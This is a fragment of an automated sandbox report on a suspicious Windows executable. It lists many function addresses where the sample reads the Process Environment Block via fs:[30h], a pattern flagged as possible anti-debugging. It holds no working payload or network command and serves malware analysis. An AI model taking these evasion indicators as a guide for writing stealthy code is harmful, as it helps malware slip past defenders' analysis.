              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013443D4 mov eax, dword ptr fs:[00000030h]3_2_013443D4
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013443D4 mov eax, dword ptr fs:[00000030h]3_2_013443D4
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AA3C0 mov eax, dword ptr fs:[00000030h]3_2_012AA3C0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AA3C0 mov eax, dword ptr fs:[00000030h]3_2_012AA3C0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AA3C0 mov eax, dword ptr fs:[00000030h]3_2_012AA3C0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AA3C0 mov eax, dword ptr fs:[00000030h]3_2_012AA3C0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AA3C0 mov eax, dword ptr fs:[00000030h]3_2_012AA3C0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AA3C0 mov eax, dword ptr fs:[00000030h]3_2_012AA3C0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A83C0 mov eax, dword ptr fs:[00000030h]3_2_012A83C0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A83C0 mov eax, dword ptr fs:[00000030h]3_2_012A83C0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A83C0 mov eax, dword ptr fs:[00000030h]3_2_012A83C0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A83C0 mov eax, dword ptr fs:[00000030h]3_2_012A83C0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0134E3DB mov eax, dword ptr fs:[00000030h]3_2_0134E3DB
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0134E3DB mov eax, dword ptr fs:[00000030h]3_2_0134E3DB
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0134E3DB mov ecx, dword ptr fs:[00000030h]3_2_0134E3DB
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0134E3DB mov eax, dword ptr fs:[00000030h]3_2_0134E3DB
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013263C0 mov eax, dword ptr fs:[00000030h]3_2_013263C0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0135C3CD mov eax, dword ptr fs:[00000030h]3_2_0135C3CD
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0129823B mov eax, dword ptr fs:[00000030h]3_2_0129823B
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01350274 mov eax, dword ptr fs:[00000030h]3_2_01350274
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01350274 mov eax, dword ptr fs:[00000030h]3_2_01350274
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01350274 mov eax, dword ptr fs:[00000030h]3_2_01350274
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01350274 mov eax, dword ptr fs:[00000030h]3_2_01350274
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01350274 mov eax, dword ptr fs:[00000030h]3_2_01350274
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01350274 mov eax, dword ptr fs:[00000030h]3_2_01350274
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01350274 mov eax, dword ptr fs:[00000030h]3_2_01350274
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01350274 mov eax, dword ptr fs:[00000030h]3_2_01350274
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01350274 mov eax, dword ptr fs:[00000030h]3_2_01350274
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01350274 mov eax, dword ptr fs:[00000030h]3_2_01350274
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01350274 mov eax, dword ptr fs:[00000030h]3_2_01350274
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01350274 mov eax, dword ptr fs:[00000030h]3_2_01350274
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0129826B mov eax, dword ptr fs:[00000030h]3_2_0129826B
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A4260 mov eax, dword ptr fs:[00000030h]3_2_012A4260
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A4260 mov eax, dword ptr fs:[00000030h]3_2_012A4260
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A4260 mov eax, dword ptr fs:[00000030h]3_2_012A4260
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0135A250 mov eax, dword ptr fs:[00000030h]3_2_0135A250
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0135A250 mov eax, dword ptr fs:[00000030h]3_2_0135A250
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0137625D mov eax, dword ptr fs:[00000030h]3_2_0137625D
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01328243 mov eax, dword ptr fs:[00000030h]3_2_01328243
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01328243 mov ecx, dword ptr fs:[00000030h]3_2_01328243
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A6259 mov eax, dword ptr fs:[00000030h]3_2_012A6259
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0129A250 mov eax, dword ptr fs:[00000030h]3_2_0129A250
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B02A0 mov eax, dword ptr fs:[00000030h]3_2_012B02A0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B02A0 mov eax, dword ptr fs:[00000030h]3_2_012B02A0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013362A0 mov eax, dword ptr fs:[00000030h]3_2_013362A0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013362A0 mov ecx, dword ptr fs:[00000030h]3_2_013362A0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013362A0 mov eax, dword ptr fs:[00000030h]3_2_013362A0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013362A0 mov eax, dword ptr fs:[00000030h]3_2_013362A0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013362A0 mov eax, dword ptr fs:[00000030h]3_2_013362A0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013362A0 mov eax, dword ptr fs:[00000030h]3_2_013362A0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DE284 mov eax, dword ptr fs:[00000030h]3_2_012DE284
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DE284 mov eax, dword ptr fs:[00000030h]3_2_012DE284
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01320283 mov eax, dword ptr fs:[00000030h]3_2_01320283
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01320283 mov eax, dword ptr fs:[00000030h]3_2_01320283
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01320283 mov eax, dword ptr fs:[00000030h]3_2_01320283
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B02E1 mov eax, dword ptr fs:[00000030h]3_2_012B02E1
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B02E1 mov eax, dword ptr fs:[00000030h]3_2_012B02E1
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B02E1 mov eax, dword ptr fs:[00000030h]3_2_012B02E1
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013762D6 mov eax, dword ptr fs:[00000030h]3_2_013762D6
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AA2C3 mov eax, dword ptr fs:[00000030h]3_2_012AA2C3
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AA2C3 mov eax, dword ptr fs:[00000030h]3_2_012AA2C3
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AA2C3 mov eax, dword ptr fs:[00000030h]3_2_012AA2C3
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AA2C3 mov eax, dword ptr fs:[00000030h]3_2_012AA2C3
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AA2C3 mov eax, dword ptr fs:[00000030h]3_2_012AA2C3
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CE53E mov eax, dword ptr fs:[00000030h]3_2_012CE53E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CE53E mov eax, dword ptr fs:[00000030h]3_2_012CE53E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CE53E mov eax, dword ptr fs:[00000030h]3_2_012CE53E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CE53E mov eax, dword ptr fs:[00000030h]3_2_012CE53E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CE53E mov eax, dword ptr fs:[00000030h]3_2_012CE53E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0535 mov eax, dword ptr fs:[00000030h]3_2_012B0535
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0535 mov eax, dword ptr fs:[00000030h]3_2_012B0535
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0535 mov eax, dword ptr fs:[00000030h]3_2_012B0535
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0535 mov eax, dword ptr fs:[00000030h]3_2_012B0535
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0535 mov eax, dword ptr fs:[00000030h]3_2_012B0535
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0535 mov eax, dword ptr fs:[00000030h]3_2_012B0535
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01336500 mov eax, dword ptr fs:[00000030h]3_2_01336500
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01374500 mov eax, dword ptr fs:[00000030h]3_2_01374500
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01374500 mov eax, dword ptr fs:[00000030h]3_2_01374500
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01374500 mov eax, dword ptr fs:[00000030h]3_2_01374500
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01374500 mov eax, dword ptr fs:[00000030h]3_2_01374500
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01374500 mov eax, dword ptr fs:[00000030h]3_2_01374500
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01374500 mov eax, dword ptr fs:[00000030h]3_2_01374500
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01374500 mov eax, dword ptr fs:[00000030h]3_2_01374500
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D656A mov eax, dword ptr fs:[00000030h]3_2_012D656A
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D656A mov eax, dword ptr fs:[00000030h]3_2_012D656A
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D656A mov eax, dword ptr fs:[00000030h]3_2_012D656A
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A8550 mov eax, dword ptr fs:[00000030h]3_2_012A8550
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A8550 mov eax, dword ptr fs:[00000030h]3_2_012A8550
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013205A7 mov eax, dword ptr fs:[00000030h]3_2_013205A7
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013205A7 mov eax, dword ptr fs:[00000030h]3_2_013205A7
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013205A7 mov eax, dword ptr fs:[00000030h]3_2_013205A7
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012C45B1 mov eax, dword ptr fs:[00000030h]3_2_012C45B1
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012C45B1 mov eax, dword ptr fs:[00000030h]3_2_012C45B1
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D4588 mov eax, dword ptr fs:[00000030h]3_2_012D4588
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A2582 mov eax, dword ptr fs:[00000030h]3_2_012A2582
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A2582 mov ecx, dword ptr fs:[00000030h]3_2_012A2582
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DE59C mov eax, dword ptr fs:[00000030h]3_2_012DE59C
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DC5ED mov eax, dword ptr fs:[00000030h]3_2_012DC5ED
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DC5ED mov eax, dword ptr fs:[00000030h]3_2_012DC5ED
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A25E0 mov eax, dword ptr fs:[00000030h]3_2_012A25E0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CE5E7 mov eax, dword ptr fs:[00000030h]3_2_012CE5E7
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CE5E7 mov eax, dword ptr fs:[00000030h]3_2_012CE5E7
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CE5E7 mov eax, dword ptr fs:[00000030h]3_2_012CE5E7
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CE5E7 mov eax, dword ptr fs:[00000030h]3_2_012CE5E7
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CE5E7 mov eax, dword ptr fs:[00000030h]3_2_012CE5E7
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CE5E7 mov eax, dword ptr fs:[00000030h]3_2_012CE5E7
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CE5E7 mov eax, dword ptr fs:[00000030h]3_2_012CE5E7
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CE5E7 mov eax, dword ptr fs:[00000030h]3_2_012CE5E7
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DE5CF mov eax, dword ptr fs:[00000030h]3_2_012DE5CF
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DE5CF mov eax, dword ptr fs:[00000030h]3_2_012DE5CF
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A65D0 mov eax, dword ptr fs:[00000030h]3_2_012A65D0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DA5D0 mov eax, dword ptr fs:[00000030h]3_2_012DA5D0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DA5D0 mov eax, dword ptr fs:[00000030h]3_2_012DA5D0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0129E420 mov eax, dword ptr fs:[00000030h]3_2_0129E420
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0129E420 mov eax, dword ptr fs:[00000030h]3_2_0129E420
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0129E420 mov eax, dword ptr fs:[00000030h]3_2_0129E420
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0129C427 mov eax, dword ptr fs:[00000030h]3_2_0129C427
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01326420 mov eax, dword ptr fs:[00000030h]3_2_01326420
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01326420 mov eax, dword ptr fs:[00000030h]3_2_01326420
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01326420 mov eax, dword ptr fs:[00000030h]3_2_01326420
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01326420 mov eax, dword ptr fs:[00000030h]3_2_01326420
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01326420 mov eax, dword ptr fs:[00000030h]3_2_01326420
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01326420 mov eax, dword ptr fs:[00000030h]3_2_01326420
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01326420 mov eax, dword ptr fs:[00000030h]3_2_01326420
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DA430 mov eax, dword ptr fs:[00000030h]3_2_012DA430
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D8402 mov eax, dword ptr fs:[00000030h]3_2_012D8402
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D8402 mov eax, dword ptr fs:[00000030h]3_2_012D8402
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D8402 mov eax, dword ptr fs:[00000030h]3_2_012D8402
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0132C460 mov ecx, dword ptr fs:[00000030h]3_2_0132C460
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CA470 mov eax, dword ptr fs:[00000030h]3_2_012CA470
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CA470 mov eax, dword ptr fs:[00000030h]3_2_012CA470
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CA470 mov eax, dword ptr fs:[00000030h]3_2_012CA470
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0135A456 mov eax, dword ptr fs:[00000030h]3_2_0135A456
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DE443 mov eax, dword ptr fs:[00000030h]3_2_012DE443
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DE443 mov eax, dword ptr fs:[00000030h]3_2_012DE443
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DE443 mov eax, dword ptr fs:[00000030h]3_2_012DE443
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DE443 mov eax, dword ptr fs:[00000030h]3_2_012DE443
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DE443 mov eax, dword ptr fs:[00000030h]3_2_012DE443
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DE443 mov eax, dword ptr fs:[00000030h]3_2_012DE443
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DE443 mov eax, dword ptr fs:[00000030h]3_2_012DE443
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DE443 mov eax, dword ptr fs:[00000030h]3_2_012DE443
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0129645D mov eax, dword ptr fs:[00000030h]3_2_0129645D
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012C245A mov eax, dword ptr fs:[00000030h]3_2_012C245A
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A64AB mov eax, dword ptr fs:[00000030h]3_2_012A64AB
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0132A4B0 mov eax, dword ptr fs:[00000030h]3_2_0132A4B0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D44B0 mov ecx, dword ptr fs:[00000030h]3_2_012D44B0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0135A49A mov eax, dword ptr fs:[00000030h]3_2_0135A49A
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A04E5 mov ecx, dword ptr fs:[00000030h]3_2_012A04E5
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0131C730 mov eax, dword ptr fs:[00000030h]3_2_0131C730
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DC720 mov eax, dword ptr fs:[00000030h]3_2_012DC720
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DC720 mov eax, dword ptr fs:[00000030h]3_2_012DC720
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D273C mov eax, dword ptr fs:[00000030h]3_2_012D273C
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D273C mov ecx, dword ptr fs:[00000030h]3_2_012D273C
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D273C mov eax, dword ptr fs:[00000030h]3_2_012D273C
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DC700 mov eax, dword ptr fs:[00000030h]3_2_012DC700
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A0710 mov eax, dword ptr fs:[00000030h]3_2_012A0710
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D0710 mov eax, dword ptr fs:[00000030h]3_2_012D0710
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A8770 mov eax, dword ptr fs:[00000030h]3_2_012A8770
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0770 mov eax, dword ptr fs:[00000030h]3_2_012B0770
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0770 mov eax, dword ptr fs:[00000030h]3_2_012B0770
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0770 mov eax, dword ptr fs:[00000030h]3_2_012B0770
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0770 mov eax, dword ptr fs:[00000030h]3_2_012B0770
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0770 mov eax, dword ptr fs:[00000030h]3_2_012B0770
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0770 mov eax, dword ptr fs:[00000030h]3_2_012B0770
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0770 mov eax, dword ptr fs:[00000030h]3_2_012B0770
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0770 mov eax, dword ptr fs:[00000030h]3_2_012B0770
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0770 mov eax, dword ptr fs:[00000030h]3_2_012B0770
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0770 mov eax, dword ptr fs:[00000030h]3_2_012B0770
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0770 mov eax, dword ptr fs:[00000030h]3_2_012B0770
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0770 mov eax, dword ptr fs:[00000030h]3_2_012B0770
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D674D mov esi, dword ptr fs:[00000030h]3_2_012D674D
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D674D mov eax, dword ptr fs:[00000030h]3_2_012D674D
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D674D mov eax, dword ptr fs:[00000030h]3_2_012D674D
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01324755 mov eax, dword ptr fs:[00000030h]3_2_01324755
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0132E75D mov eax, dword ptr fs:[00000030h]3_2_0132E75D
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A0750 mov eax, dword ptr fs:[00000030h]3_2_012A0750
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E2750 mov eax, dword ptr fs:[00000030h]3_2_012E2750
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E2750 mov eax, dword ptr fs:[00000030h]3_2_012E2750
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A07AF mov eax, dword ptr fs:[00000030h]3_2_012A07AF
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013547A0 mov eax, dword ptr fs:[00000030h]3_2_013547A0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0134678E mov eax, dword ptr fs:[00000030h]3_2_0134678E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012C27ED mov eax, dword ptr fs:[00000030h]3_2_012C27ED
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012C27ED mov eax, dword ptr fs:[00000030h]3_2_012C27ED
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012C27ED mov eax, dword ptr fs:[00000030h]3_2_012C27ED
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A47FB mov eax, dword ptr fs:[00000030h]3_2_012A47FB
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A47FB mov eax, dword ptr fs:[00000030h]3_2_012A47FB
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0132E7E1 mov eax, dword ptr fs:[00000030h]3_2_0132E7E1
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AC7C0 mov eax, dword ptr fs:[00000030h]3_2_012AC7C0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013207C3 mov eax, dword ptr fs:[00000030h]3_2_013207C3
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A262C mov eax, dword ptr fs:[00000030h]3_2_012A262C
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012BE627 mov eax, dword ptr fs:[00000030h]3_2_012BE627
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D6620 mov eax, dword ptr fs:[00000030h]3_2_012D6620
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D8620 mov eax, dword ptr fs:[00000030h]3_2_012D8620
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B260B mov eax, dword ptr fs:[00000030h]3_2_012B260B
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B260B mov eax, dword ptr fs:[00000030h]3_2_012B260B
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B260B mov eax, dword ptr fs:[00000030h]3_2_012B260B
